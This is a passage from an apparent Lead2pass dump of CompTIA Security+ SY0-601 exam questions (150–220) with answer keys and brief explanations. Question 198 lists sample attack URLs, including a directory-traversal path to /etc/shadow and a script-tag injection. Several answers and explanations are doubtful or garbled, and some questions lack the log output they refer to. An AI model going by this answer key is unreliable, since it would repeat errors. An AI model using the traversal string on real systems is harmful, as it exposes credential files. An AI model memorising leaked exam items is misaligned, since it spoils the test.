ABAC
SCAP
SOAR
Answer: D
QUESTION 150
A security analyst sees the following log output while reviewing web logs:
Which of the following mitigation strategies would be BEST to prevent this attack from being
successful?
A.
B.
C.
D.
Secure cookies
Input validation
Code signing
Stored procedures
Answer: B
QUESTION 151
A Chief Information Security Officer (CISO) is concerned about the organization's ability to
continue business operation in the event of a prolonged DDoS attack on its local datacenter that
consumes database resources. Which of the following will the CISO MOST likely recommend to
mitigate this risk?
A.
B.
C.
D.
Upgrade the bandwidth available into the datacenter
Implement a hot-site failover location
Switch to a complete SaaS offering to customers
Implement a challenge response test on all end-user queries
Answer: B
QUESTION 152
Which of the following secure coding techniques makes compromised code more difficult for
hackers to use?
A.
B.
C.
D.
Obfuscation
Normalization
Execution
Reuse
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
54
Explanation:
Obfuscation is the action of making something obscure, unclear, or unintelligible. In software
development, obfuscation is the act of creating code that is difficult for humans or computers to
understand.
QUESTION 153
An incident response technician collected a mobile device during an investigation. Which of the
following should the technician do to maintain chain of custody?
A.
B.
C.
D.
Document the collection and require a sign-off when possession changes.
Lock the device in a safe or other secure location to prevent theft or alteration.
Place the device in a Faraday cage to prevent corruption of the data.
Record the collection in a blockchain-protected public ledger.
Answer: A
Explanation:
Document the collection and require a sign-off when possession changes is the correct option to
maintain chain of custody when collecting a mobile device during an investigation. It is important
to document the collection process, including who collected the device, when and where it was
collected, and any other relevant details. It is also necessary to require a sign-off when
possession changes, to ensure accountability and track the device's movement. This helps
maintain the integrity of the evidence and ensures that it can be used in legal proceedings.
QUESTION 154
An organization's RPO for a critical system is two hours. The system is used Monday through
Friday, from 9:00 am to 5:00 pm. Currently, the organization performs a full backup every
Saturday that takes four hours to complete. Which of the following additional backup
implementations would be the BEST way for the analyst to meet the business requirements?
A.
B.
C.
D.
Incremental backups Monday through Friday at 6:00 p.m and differential backups hourly
Full backups Monday through Friday at 6:00 p.m and incremental backups hourly.
incremental backups Monday through Friday at 6:00 p.m and full backups hourly.
Full backups Monday through Friday at 6:00 p.m and differential backups hourly.
Answer: A
QUESTION 155
A security analyst discovers that a company username and password database was posted on an
internet forum. The username and passwords are stored in plan text.
Which of the following would mitigate the damage done by this type of data exfiltration in the
future?
A.
B.
C.
D.
Create DLP controls that prevent documents from leaving the network
Implement salting and hashing
Configure the web content filter to block access to the forum.
Increase password complexity requirements
Answer: B
Explanation:
Salting and hashing are techniques used to protect the security of passwords stored in a
database. Salting involves adding random data, known as a "salt," to each password before it is
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
55
hashed. This makes it more difficult for attackers to crack the passwords by using pre-computed
hash tables, known as "rainbow tables." Hashing involves applying a one-way mathematical
function, known as a "hash algorithm," to the salted password to produce a fixed-length output,
known as a "hash value." This makes it impossible to determine the original password from the
hash value, even if the attacker has access to the database. By implementing salting and
hashing, the company can ensure that its passwords are protected even if the database is
compromised
QUESTION 156
After a ransomware attack a forensics company needs to review a cryptocurrency transaction
between the victim and the attacker. Which of the following will the company MOST likely review
to trace this transaction?
A.
B.
C.
D.
The public ledger
The NetFlow data
A checksum
The event log
Answer: A
QUESTION 157
Which of the following is a team of people dedicated testing the effectiveness of organizational
security programs by emulating the techniques of potential attackers?
A.
B.
C.
D.
Red team
While team
Blue team
Purple team
Answer: A
Explanation:
Red team--performs the offensive role to try to infiltrate the target.
QUESTION 158
Which of the following job roles would sponsor data quality and data entry initiatives that ensure
business and regulatory requirements are met?
A.
B.
C.
D.
The data owner
The data processor
The data steward
The data privacy officer.
Answer: C
QUESTION 159
A retail executive recently accepted a job with a major competitor. The following week, a security
analyst reviews the security logs and identifies successful logon attempts to access the departed
executive's accounts. Which of the following security practices would have addressed the issue?
A. A non-disclosure agreement
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
56
B. Least privilege
C. An acceptable use policy
D. Offboarding
Answer: D
QUESTION 160
A network administrator would like to configure a site-to-site VPN utilizing iPSec.
The administrator wants the tunnel to be established with data integrity encryption, authentication
and anti- replay functions.
Which of the following should the administrator use when configuring the VPN?
A.
B.
C.
D.
AH
EDR
ESP
DNSSEC
Answer: C
Explanation:
https://www.hypr.com/encapsulating-security-payload-esp/
Encapsulating Security Payload (ESP) is a member of the Internet Protocol Security (IPsec) set
of protocols that encrypt and authenticate the packets of data between computers using a Virtual
Private Network (VPN). The focus and layer on which ESP operates makes it possible for VPNs
to function securely.
QUESTION 161
The following is an administrative control that would be MOST effective to reduce the occurrence
of malware execution?
A.
B.
C.
D.
Security awareness training
Frequency of NIDS updates
Change control procedures
EDR reporting cycle
Answer: A
Explanation:
Security awareness training is the administrative control that would be MOST effective to reduce
the occurrence of malware execution. Malware is often introduced to an organization's network
through human error, such as clicking on a malicious link or downloading an infected file. Security
awareness training can help educate employees on how to identify and avoid common malware
threats, such as phishing attacks, and provide best practices for safe browsing and downloading.
QUESTION 162
The Chief Security Officer (CSO) at a major hospital wants to implement SSO to help improve in
the environment patient data, particularly at shared terminals. The Chief Risk Officer (CRO) is
concerned that training and guidance have been provided to frontline staff, and a risk analysis
has not been performed.
Which of the following is the MOST likely cause of the CRO's concerns?
A. SSO would simplify username and password management, making it easier for hackers to pass
guess accounts.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
57
B. SSO would reduce password fatigue, but staff would still need to remember more complex
passwords.
C. SSO would reduce the password complexity for frontline staff.
D. SSO would reduce the resilience and availability of system if the provider goes offline.
Answer: D
QUESTION 163
A smart switch has the ability to monitor electrical levels and shut off power to a building in the
event of power surge or other fault situation. The switch was installed on a wired network in a
hospital and is monitored by the facilities department via a cloud application. The security
administrator isolated the switch on a separate VLAN and set up a patch routine. Which of the
following steps should also be taken to harden the smart switch?
A.
B.
C.
D.
Set up an air gap for the switch.
Change the default password for the switch.
Place the switch In a Faraday cage.
Install a cable lock on the switch
Answer: B
QUESTION 164
Which of the following describes the BEST approach for deploying application patches?
A. Apply the patches to systems in a testing environment then to systems in a staging environment,
and finally to production systems.
B. Test the patches in a staging environment, develop against them in the development
environment, and then apply them to the production systems
C. Test the patches m a test environment apply them to the production systems and then apply them
to a staging environment
D. Apply the patches to the production systems apply them in a staging environment, and then test
all of them in a testing environment
Answer: A
QUESTION 165
A security engineer needs to enhance MFA access to sensitive areas in a building. A key card
and fingerprint scan are already in use.
Which of the following would add another factor of authentication?
A.
B.
C.
D.
Hard token
Retina scan
SMS text
Keypad PIN
Answer: D
QUESTION 166
A symmetric encryption algorithm is BEST suited for:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
58
A.
B.
C.
D.
key-exchange scalability.
protecting large amounts of data.
providing hashing capabilities,
implementing non-repudiation.
Answer: B
Explanation:
Symmetric encryption is a means of protecting data using a secret key to encrypt (lock) and
decrypt (unlock) it. The sender and recipient share the key or password to gain access to the
information. The key can be a word; a phrase; or a nonsensical or random string of letters,
numbers, and symbols.
QUESTION 167
A company has limited storage space available and an online presence that cannot be down for
more than four hours. Which of the following backup methodologies should the company
implement to allow for the FASTEST database restore time in the event of a failure, while being
mindful of the limited available storage space?
A. Implement full tape backups every Sunday at 8:00 p.m. and perform nightly tape rotations.
B. Implement differential backups every Sunday at 8:00 p.m. and nightly incremental backups at
8:00 p.m.
C. Implement nightly full backups every Sunday at 8:00 p.m.
D. Implement full backups every Sunday at 8:00 p.m. and nightly differential backups at 8:00 p.m.
Answer: D
Explanation:
Do not combine differential and incremental backups. Use full backups interspersed with
differential backups or full backups interspersed with incremental backups.
QUESTION 168
A security analyst is reviewing information regarding recent vulnerabilities. Which of the following
will the analyst MOST likely consult to validate which platforms have been affected?
A.
B.
C.
D.
OSINT
SIEM
CVSS
CVE
Answer: D
Explanation:
CVE is simply a list of all publicly disclosed vulnerabilities that includes the CVE ID, a description,
dates, and comments.
QUESTION 169
A security analyst needs to produce a document that details how a security incident occurred, the
steps that were taken for recovery, and how future incidents can be avoided. During which of the
following stages of the response process will this activity take place?
A. Recovery
B. Identification
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
59
C. Lessons learned
D. Preparation
Answer: C
Explanation:
Lessons learned or remediation step is the final phase of the incident response. It examines and
documents how well the team responded, discovers what caused the incident, and determines
how the incident can be avoided in the future.
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for
a future incident.
QUESTION 170
A critical file server is being upgraded and the systems administrator must determine which RAID
level the new server will need to achieve parity and handle two simultaneous disk failures.
Which of the following RAID levels meets this requirements?
A.
B.
C.
D.
RAID 0+1
RAID 2
RAID 5
RAID 6
Answer: D
QUESTION 171
Which of the following provides the BEST protection for sensitive information and data stored in
cloud-based services but still allows for full functionality and searchability of data within the cloudbased services?
A.
B.
C.
D.
Data encryption
Data masking
Anonymization
Tokenization
Answer: A
Explanation:
Data encryption is the process of converting data into a form that is unreadable by unauthorized
users. This is done by using a mathematical algorithm to scramble the data. The scrambled data
is known as ciphertext.
To decrypt the data, the user must have the encryption key. The encryption key is a secret piece
of information that is used to unscramble the ciphertext.
Data encryption is the most effective way to protect sensitive information. It is also the only option
that allows for full functionality and searchability of data within the cloud-based services.
QUESTION 172
A company uses wireless tor all laptops and keeps a very detailed record of its assets, along with
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
60
a comprehensive list of devices that are authorized to be on the wireless network. The Chief
Information Officer (CIO) is concerned about a script kiddie potentially using an unauthorized
device to brute force the wireless PSK and obtain access to the internal network. Which of the
following should the company implement to BEST prevent this from occurring?
A.
B.
C.
D.
A BPDU guard
WPA-EAP
IP filtering
A WIDS
Answer: D
Explanation:
A wireless intrusion detection system (WIDS) is a device that monitors wireless traffic for
malicious activity. It can detect unauthorized devices trying to connect to the network, as well as
attempts to brute force the wireless PSK.
QUESTION 173
Which of the following would be BEST to establish between organizations that have agreed
cooperate and are engaged in early discussion to define the responsibilities of each party, but do
not want to establish a contractually binding agreement?
A.
B.
C.
D.
An SLA
An NDA
A BPA
An MOU
Answer: D
QUESTION 174
A Chief Executive Officer's (CEO) personal information was stolen in a social engineering attack.
Which of the following sources would reveal if the CEO's personal information is for sale?
A.
B.
C.
D.
Automated information sharing
Open-source intelligence
The dark web
Vulnerability databases
Answer: C
Explanation:
The dark web is where you go for the purchase of illegal items.
QUESTION 175
An organization suffered an outage and a critical system took 90 minutes to come back online.
Though there was no data loss during the outage, the expectation was that the critical system
would be available again within 60 minutes.
Which of the following is the 60- minute expectation an example of:
A. MTBF
B. RPO
C. MTTR
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
61
D. RTO
Answer: D
QUESTION 176
A smart retail business has a local store and a newly established and growing online storefront. A
recent storm caused a power outage to the business and the local ISP, resulting in several hours
of lost sales and delayed order processing. The business owner now needs to ensure two things:
- Protection from power outages
- Always-available connectivity In case of an outage
The owner has decided to implement battery backups for the computer equipment Which of the
following would BEST fulfill the owner's second need?
A.
B.
C.
D.
Lease a point-to-point circuit to provide dedicated access.
Connect the business router to its own dedicated UPS.
Purchase services from a cloud provider for high availability
Replace the business's wired network with a wireless network.
Answer: C
QUESTION 177
A company recently moved sensitive videos between on-premises, company-owned websites.
The company then learned the videos had been uploaded and shared to the Internet. Which of
the following would MOST likely allow the company to find the cause?
A.
B.
C.
D.
E.
Checksums
Watermarks
Oder of volatility
A log analysis
A right-to-audit clause
Answer: D
Explanation:
https://www.sumologic.com/glossary/log-analysis/
"While companies can operate private clouds, forensics in a public cloud are complicated by the
right to audit permitted to you by your service level agreement (SLA) with the cloud provider."
QUESTION 178
A company's Chief Information Officer (CIO) is meeting with the Chief Information Security Officer
(CISO) to plan some activities to enhance the skill levels of the company's developers. Which of
the following would be MOST suitable for training the developers?
A.
B.
C.
D.
A capture-the-flag competition
A phishing simulation
Physical security training
Basic awareness training
Answer: A
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
62
Capture The Flags, or CTFs, are a kind of computer security competition.
Teams of competitors (or just individuals) are pitted against each other in a test of computer
security skill.
Very often CTFs are the beginning of one's cyber security career due to their team building
nature and competitive aspect. In addition, there isn't a lot of commitment required beyond a
weekend.
QUESTION 179
A user recently entered a username and password into a recruiting application website that had
been forged to look like the legitimate site Upon investigation, a security analyst the identifies the
following:
- The legitimate websites IP address is 10.1.1.20 and eRecruit.local
resolves to the IP
- The forged website's IP address appears to be 10.2.12.99. based on
NetFlow records
- AH three at the organization's DNS servers show the website correctly
resolves to the legitimate IP
- DNS query logs show one of the three DNS servers returned a result of
10.2.12.99 (cached) at the approximate time of the suspected
compromise.
Which of the following MOST likely occurred?
A.
B.
C.
D.
A reverse proxy was used to redirect network traffic
An SSL strip MITM attack was performed
An attacker temporarily pawned a name server
An ARP poisoning attack was successfully executed
Answer: C
QUESTION 180
Local guidelines require that all information systems meet a minimum-security baseline to be
compliant. Which of the following can security administrators use to assess their system
configurations against the baseline?
A.
B.
C.
D.
SOAR playbook
Security control matrix
Risk management framework
Benchmarks
Answer: D
QUESTION 181
Which of the following would be BEST to establish between organizations to define the
responsibilities of each party, outline the key deliverables, and include monetary penalties for
breaches to manage third-party risk?
A. An ARO
B. An MOU
C. An SLA
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
63
D. A BPA
Answer: C
Explanation:
The keyword is "include monetary penalties for breaches". SLA includes penalties for not
delivering services up to contract, BPA does not.
QUESTION 182
A large industrial system's smart generator monitors the system status and sends alerts to thirdparty maintenance personnel when critical failures occur. While reviewing the network logs the
company's security manager notices the generator's IP is sending packets to an internal file
server's IP. Which of the following mitigations would be BEST for the security manager to
implement while maintaining alerting capabilities?
A.
B.
C.
D.
Segmentation
Firewall whitelisting
Containment
isolation
Answer: A
QUESTION 183
Which of the following ISO standards is certified for privacy?
A.
B.
C.
D.
ISO 9001
ISO 27002
ISO 27701
ISO 31000
Answer: C
Explanation:
ISO 27701 also abbreviated as PIMS (Privacy Information Management System) outlines a
framework for Personally Identifiable Information (PII) Controllers and PII Processors to manage
data privacy. Privacy information management systems are sometimes referred to as personal
information management systems.
QUESTION 184
Which of the following technical controls is BEST suited for the detection and prevention of buffer
overflows on hosts?
A.
B.
C.
D.
DLP
HIDS
EDR
NIPS
Answer: C
QUESTION 185
A recent audit uncovered a key finding regarding the use of a specific encryption standard in a
web application that is used to communicate with business customers. Due to the technical
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
64
limitations of its customers the company is unable to upgrade the encryption standard.
Which of the following types of controls should be used to reduce the risk created by this
scenario?
A.
B.
C.
D.
Physical
Detective
Preventive
Compensating
Answer: D
QUESTION 186
A security assessment determines DES and 3DES at still being used on recently deployed
production servers. Which of the following did the assessment identify?
A.
B.
C.
D.
Unsecme protocols
Default settings
Open permissions
Weak encryption
Answer: D
QUESTION 187
A consultant is configuring a vulnerability scanner for a large, global organization in multiple
countries. The consultant will be using a service account to scan systems with administrative
privileges on a weekly basis, but there is a concern that hackers could gain access to account to
the account and pivot through the global network. Which of the following would be BEST to help
mitigate this concern?
A.
B.
C.
D.
Create consultant accounts for each region, each configured with push MFA notifications.
Create one global administrator account and enforce Kerberos authentication
Create different accounts for each region. limit their logon times, and alert on risky logins
Create a guest account for each region. remember the last ten passwords, and block password
reuse
Answer: C
QUESTION 188
A security modern may have occurred on the desktop PC of an organization's Chief Executive
Officer (CEO) A duplicate copy of the CEO's hard drive must be stored securely to ensure
appropriate forensic processes and the chain of custody are followed. Which of the following
should be performed to accomplish this task?
A. Install a new hard drive in the CEO's PC, and then remove the old hard drive and place it in a
tamper-evident bag
B. Connect a write blocker to the hard drive Then leveraging a forensic workstation, utilize the dd
command m a live Linux environment to create a duplicate copy
C. Remove the CEO's hard drive from the PC, connect to the forensic workstation, and copy all the
contents onto a remote fileshare while the CEO watches
D. Refrain from completing a forensic analysts of the CEO's hard drive until after the incident is
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
65
confirmed, duplicating the hard drive at this stage could destroy evidence
Answer: B
Explanation:
To obtain a forensically sound image from nonvolatile storage, you need to ensure that nothing
you do alters data or metadata (properties) on the source disk or file system. A write blocker
assures this process by preventing any data on the disk or volume from being changed by
filtering write commands at the driver and OS level. Data acquisition would normally proceed by
attaching the target device to a forensics workstation or field capture device equipped with a write
blocker.
https://security.opentext.com/tableau/hardware/details/t8u
QUESTION 189
A security analyst needs to implement an MDM solution for BYOD users that will allow the
company to retain control over company emails residing on the devices and limit data exfiltration
that might occur if the devices are lost or stolen. Which of the following would BEST meet these
requirements? (Choose two.)
A.
B.
C.
D.
E.
F.
Full-device encryption
Network usage rules
Geofencing
Containerization
Application whitelisting
Remote control
Answer: DF
Explanation:
Containerization and remote control are two solutions that can help a security analyst implement
an MDM (Mobile Device Management) solution for BYOD (Bring Your Own Device) users that will
allow the company to retain control over company emails residing on the devices and limit data
exfiltration if the devices are lost or stolen.
Containerization allows the company to create a secure and isolated environment (container) on
the user's device to store company data, including email. This container can be managed and
secured independently from the user's personal environment on the device, ensuring that
company data is protected.
Remote control enables the security analyst to remotely access and manage the user's device.
This allows the analyst to remotely wipe company data from the device if it is lost or stolen, or to
lock or locate the device. Additionally, remote control can be used to enforce security policies and
configurations on the device to ensure it complies with the company's security requirements.
QUESTION 190
A security analyst receives the configuration of a current VPN profile and notices the
authentication is only applied to the IP datagram portion of the packet.
Which of the following should the analyst implement to authenticate the entire packet?
A.
B.
C.
D.
AH
ESP
SRTP
LDAP
Answer: B
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
66
QUESTION 191
Company engineers regularly participate in a public Internet forum with other engineers
throughout the industry. Which of the following tactics would an attacker MOST likely use in this
scenario?
A.
B.
C.
D.
Watering-hole attack
Credential harvesting
Hybrid warfare
Pharming
Answer: A
Explanation:
An attack in which an attacker targets specific groups or organizations, discovers which websites
they frequent, and injects malicious code into those sites.
QUESTION 192
Employees are having issues accessing the company's website. Some employees report very
slow performance, while others cannot the website at all. The web and security administrators
search the logs and find millions of half-open connections to port 443 on the web server. Further
analysis reveals thousands of different source IPs initiating this traffic. Which of the following
attacks is MOST likely occurring?
A.
B.
C.
D.
DDoS
Man-in-the-middle
MAC flooding
Domain hijacking
Answer: A
QUESTION 193
An organization has hired a security analyst to perform a penetration test. The analyst captures
1Gb worth of inbound network traffic to the server and transfer the pcap back to the machine for
analysis. Which of the following tools should the analyst use to further review the pcap?
A.
B.
C.
D.
Nmap
cURL
Netcat
Wireshark
Answer: D
QUESTION 194
A security analyst is investigation an incident that was first reported as an issue connecting to
network shares and the internet, While reviewing logs and tool output, the analyst sees the
following:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
67
Which of the following attacks has occurred?
A.
B.
C.
D.
E.
IP conflict
Pass-the-hash
MAC flooding
Directory traversal
ARP poisoning
Answer: E
Explanation:
Generally, the aim is to associate the attacker's MAC address with the IP address of another
host, such as the default gateway, causing any traffic meant for that IP address to be sent to the
attacker instead.
https://en.wikipedia.org/wiki/ARP_spoofing
QUESTION 195
An engineer wants to access sensitive data from a corporate-owned mobile device. Personal data
is not allowed on the device. Which of the following MDM configurations must be considered
when the engineer travels for business?
A.
B.
C.
D.
Screen locks
Application management
Geofencing
Containerization
Answer: D
QUESTION 196
An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the
incident response plan to ensure its validity and thoroughness. Which of the following will the
CSO MOST likely use?
A.
B.
C.
D.
An external security assessment
A bug bounty program
A tabletop exercise
A red-team engagement
Answer: C
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
68
QUESTION 197
A company recently experienced a data breach and the source was determined to be an
executive who was charging a phone in a public area. Which of the following would MOST likely
have prevented this breach?
A.
B.
C.
D.
A firewall
A device pin
A USB data blocker
Biometrics
Answer: C
Explanation:
Malicious USB charging cables and plugs are also a widespread problem. As with card skimming,
a device may be placed over a public charging port at airports and other transit locations. A USB
data blocker can provide mitigation against these juice- jacking attacks by preventing any sort of
data transfer when the smartphone or laptop is connected to a charge point.
QUESTION 198
A cybersecurity analyst reviews the log files from a web server and sees a series of files that
indicates a directory-traversal attack has occurred. Which of the following is the analyst MOST
likely seeing?
A.
B.
C.
D.
http://sample.url.com/<script>Please-Visit-Our-Phishing-Site</script>
http://sample.url.com/someotherpageonsite/../../../etc/shadow
http://sample.url.com/select-from-database-where-password-null
http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect
Answer: B
Explanation:
According to Dion Training, whenever you see "../../../../.." is directory traversal.
QUESTION 199
A workwide manufacturing company has been experiencing email account compromised. In one
incident, a user logged in from the corporate office in France, but then seconds later, the same
user account attempted a login from Brazil. Which of the following account policies would BEST
prevent this type of attack?
A.
B.
C.
D.
Network location
Impossible travel time
Geolocation
Geofencing
Answer: B
Explanation:
It states it is a worldwide company so you cannot set up a geofencing perimeter. However you
could have impossible travel time alerts.
QUESTION 200
A network administrator has been asked to design a solution to improve a company's security
posture The administrator is given the following, requirements?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
69
- The solution must be inline in the network
- The solution must be able to block known malicious traffic
- The solution must be able to stop network-based attacks
Which of the following should the network administrator implement to BEST meet these
requirements?
A.
B.
C.
D.
HIDS
NIDS
HIPS
NIPS
Answer: D
QUESTION 201
An analyst visits an internet forum looking for information about a tool. The analyst finds a threat
that appears to contain relevant information. One of the posts says the following:
Which of the following BEST describes the attack that was attempted against the forum readers?
A.
B.
C.
D.
SOU attack
DLL attack
XSS attack
API attack
Answer: C
Explanation:
Cross-site scripting attacks may occur anywhere that possibly malicious users are allowed to post
unregulated material to a trusted website for the consumption of other valid users. The most
common example can be found in bulletin-board websites which provide web based mailing liststyle functionality.
://owasp.org/www-community/attacks/xss/
https://www.acunetix.com/websitesecurity/cross-site-scripting/
QUESTION 202
Which of the following organizational policies are MOST likely to detect fraud that is being
conducted by existing employees? (Choose two.)
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
70
A.
B.
C.
D.
E.
F.
Offboarding
Mandatory vacation
Job rotation
Background checks
Separation of duties
Acceptable use
Answer: BC
QUESTION 203
When selecting a technical solution for identity management, an architect chooses to go from an
in-house to a third-party SaaS provider. Which of the following risk management strategies is this
an example of?
A.
B.
C.
D.
Acceptance
Mitigation
Avoidance
Transference
Answer: D
Explanation:
Risk Transference refers to the shifting of the burden of loss for a risk to another party through
legislation, contract, insurance or other means.
https://www.bcmpedia.org/wiki/Risk_Transference
QUESTION 204
A security analyst is looking for a solution to help communicate to the leadership team the
seventy levels of the organization's vulnerabilities. Which of the following would BEST meet this
need?
A.
B.
C.
D.
CVE
SIEM
SOAR
CVSS
Answer: D
Explanation:
The Common Vulnerability Scoring System (CVSS) is a system widely used in vulnerability
management programs. CVSS indicates the severity of an information security vulnerability, and
is an integral component of many vulnerability scanning tools.
QUESTION 205
A technician needs to prevent data loss in a laboratory. The laboratory is not connected to any
external networks. Which of the following methods would BEST prevent data? (Select TWO)
A.
B.
C.
D.
E.
VPN
Drive encryption
Network firewall
File-level encryption
USB blocker
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
71
F. MFA
Answer: BE
QUESTION 206
Which of the following types of controls is a turnstile?
A.
B.
C.
D.
Physical
Detective
Corrective
Technical
Answer: A
QUESTION 207
After entering a username and password, an administrator must draw a gesture on a touch
screen. Which of the following demonstrates what the administrator is providing?
A.
B.
C.
D.
Multifactor authentication
Something you can do
Biometric
Two-factor authentication
Answer: B
Explanation:
The something you can do authentication factor refers to actions you can take such as gestures
on a touch screen. As an example, Microsoft Windows 10 supports picture passwords. Users first
select a picture, and then they can add three gestures as their picture password. Gestures
include tapping in specific places on the picture, drawing lines between items with a finger, or
drawing a circle around an item such as someone’s head. After registering the picture and their
gestures, users repeat these gestures to log on again later.
QUESTION 208
A security analyst is reviewing the following attack log output:
Which of the following types of attacks does this MOST likely represent?
A. Rainbow table
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
72
B. Brute-force
C. Password-spraying
D. Dictionary
Answer: C
Explanation:
Password spraying is a type of brute-force attack in which a malicious actor uses a single
password against targeted user accounts before moving on to attempt a second password, and
so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account
lockouts.
QUESTION 209
Which of the following algorithms has the SMALLEST key size?
A.
B.
C.
D.
DES
Twofish
RSA
AES
Answer: A
QUESTION 210
A website developer is working on a new e-commerce website and has asked an information
security expert for the most appropriate way to store credit card numbers to create an easy
reordering process. Which of the following methods would BEST accomplish this goal?
A.
B.
C.
D.
Salting the magnetic strip information
Encrypting the credit card information in transit.
Hashing the credit card numbers upon entry.
Tokenizing the credit cards in the database
Answer: D
Explanation:
Credit card tokenization is the process of de-identifying sensitive cardholder data by converting it
to a string of randomly generated numbers called a "token." Similar to encryption, tokenization
obfuscates the original data to render it unreadable in the event of a data breach or other
exposure.
QUESTION 211
A financial analyst is expecting an email containing sensitive information from a client. When the
email arrives, the analyst receives an error and is unable to open the encrypted message. Which
of the following is the MOST likely cause of the issue?
A.
B.
C.
D.
The S/MME plug-in is not enabled.
The SLL certificate has expired.
Secure IMAP was not implemented
POP3S is not supported.
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
73
QUESTION 212
A system administrator needs to implement an access control scheme that will allow an object's
access policy be determined by its owner.
Which of the following access control schemes BEST fits the requirements?
A.
B.
C.
D.
Role-based access control
Discretionary access control
Mandatory access control
Attribute-based access control
Answer: B
Explanation:
Discretionary access control (DAC) is a model of access control based on access being
determined "by the owner" of the resource in question. The owner of the resource can decide
who does and does not have access, and exactly what access they are allowed to have.
QUESTION 213
Which of the following are the MOST likely vectors for the unauthorized or unintentional inclusion
of vulnerable code in a software company's final software releases? (Choose two.)
A.
B.
C.
D.
E.
F.
Unsecure protocols
Use of penetration-testing utilities
Weak passwords
Included third-party libraries
Vendors/supply chain
Outdated anti-malware software
Answer: DE
Explanation:
Plenty of example for vulnerabilities introduced by insecure third party libraries.
QUESTION 214
A malicious actor recently penetration a company's network and moved laterally to the
datacenter. Upon investigation, a forensics firm wants to know was in the memory on the
compromised server. Which of the following files should be given to the forensics firm?
A.
B.
C.
D.
Security
Application
Dump
Syslog
Answer: C
Explanation:
Dump files are a special type of files that store information about your computer, the software on
it, and the data loaded in the memory when something bad happens. They are usually
automatically generated by Windows or by the apps that crash, but you can also manually
generate them.
QUESTION 215
An enterprise has hired an outside security firm to conduct penetration testing on its network and
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
74
applications. The firm has only been given the documentation available to the customers of the
applications. Which of the following BEST represents the type of testing that will occur?
A.
B.
C.
D.
Bug bounty
Black-box
Gray-box
White-box
Answer: C
Explanation:
In White Box testing internal structure (code) is known.
In Black Box testing internal structure (code) is unknown.
In Grey Box Testing internal structure (code) is partially known.
QUESTION 216
A small business just recovered from a ransomware attack against its file servers by purchasing
the decryption keys from the attackers. The issue was triggered by a phishing email and the IT
administrator wants to ensure it does not happen again. Which of the following should the IT
administrator do FIRST after recovery?
A. Scan the NAS for residual or dormant malware and take new daily backups that are tested on a
frequent basis
B. Restrict administrative privileges and patch ail systems and applications.
C. Rebuild all workstations and install new antivirus software
D. Implement application whitelisting and perform user application hardening
Answer: A
Explanation:
The reason the company had to pay the ransom is because they did not have valid backups,
otherwise they would have just restored their data. If your company just had to pay ransom and
your boss says, "Don't let this happen again", what is the first thing you are going to do. The only
action after a ransomware attack is "restore from backup".
QUESTION 217
A well-known organization has been experiencing attacks from APIs. The organization is
concerned that custom malware is being created and emailed into the company or installed on
USB sticks that are dropped in parking lots. Which of the following is the BEST defense against
this scenario?
A.
B.
C.
D.
Configuring signature-based antivirus to update every 30 minutes
Enforcing S/MIME for email and automatically encrypting USB drives upon insertion.
Implementing application execution in a sandbox for unknown software.
Fuzzing new files for vulnerabilities if they are not digitally signed
Answer: C
Explanation:
Encryption is the method by which information is converted into secret code that hides the
information's true meaning. This does nothing for protecting a system. Encrypting bad code will
just look different and mess up your system anyway.
QUESTION 218
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
75
A cybersecurity administrator has a reduced team and needs to operate an on-premises network
and security infrastructure efficiently. To help with the situation, the administrator decides to hire a
service provider. Which of the following should the administrator use?
A.
B.
C.
D.
E.
SDP
AAA
IaaS
MSSP
Microservices
Answer: D
Explanation:
https://www.techtarget.com/searchitchannel/definition/MSSP
QUESTION 219
Which of the following will provide the BEST physical security countermeasures to stop intruders?
(Choose two.)
A.
B.
C.
D.
E.
F.
Alarms
Signage
Lighting
Mantraps
Fencing
Sensors
Answer: DE
Explanation:
Lighting can help provide visibility at night and deter potential intruders, but it may not necessarily
stop an intruder who is determined to enter a facility. Access control vestibules, fencing, are more
directly aimed at preventing entry. Alarms and signage can also serve as a deterrent and provide
a way to alert security personnel if an intrusion occurs.
QUESTION 220
A security engineer needs to Implement the following requirements:
- All Layer 2 switches should leverage Active Directory tor authentication.
- All Layer 2 switches should use local fallback authentication If Active Directory Is offline.
- All Layer 2 switches are not the same and are manufactured by several vendors.
Which of the following actions should the engineer take to meet these requirements? (Choose
two.)
A.
B.
C.
D.
E.
F.
Implement RADIUS.
